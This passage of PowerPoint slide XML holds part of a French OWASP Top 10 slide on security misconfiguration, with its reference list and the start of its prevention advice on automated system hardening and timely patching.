            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>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err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Références</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">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12"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">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3"/>
              </a:rPr>
              <a:t>OWASP Development Guide: Chapter on Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">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4"/>
              </a:rPr>
              <a:t>OWASP Code Review Guide: Chapter on Error Handling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">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5"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Configuration Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Error Codes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">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7"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>Insecure Configuration Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pour plus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’informations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>il</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> possible de consulter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>ASVS requirements area for Security Configuration (V12)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Externe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId19"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">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20"/>
              </a:rPr>
              <a:t>PC Magazine Article on Web Server Hardening</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">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21"/>
              </a:rPr>
              <a:t>CWE Entry 2 on Environmental Security Flaws</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">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22"/>
              </a:rPr>
              <a:t>CIS Security Configuration Guides/Benchmarks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>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Comment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>empêcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cette</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attaque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>La recommandation principale est de mettre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>en place </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tous </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>points suivants</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>processus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>durcissement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reproductible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> qui </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>permet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>déploiement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rapide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et facile d’un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nouvel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>environnement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>correctement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>verrouillé</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, QA et Prod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>devraient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>être</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>configurés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>identiquement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(hors </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accès</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>processus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>devrait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>être</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>automatisé</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>minimiser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> les efforts de configuration d’un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nouvel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>environnement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600" algn="just">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>processus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>d’information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> et de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>déploiement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nouvelles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> versions et de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>correctifs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> un temps </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>voulu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chaque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>environnement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ceci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inclut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> le code de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>librairies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Voir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
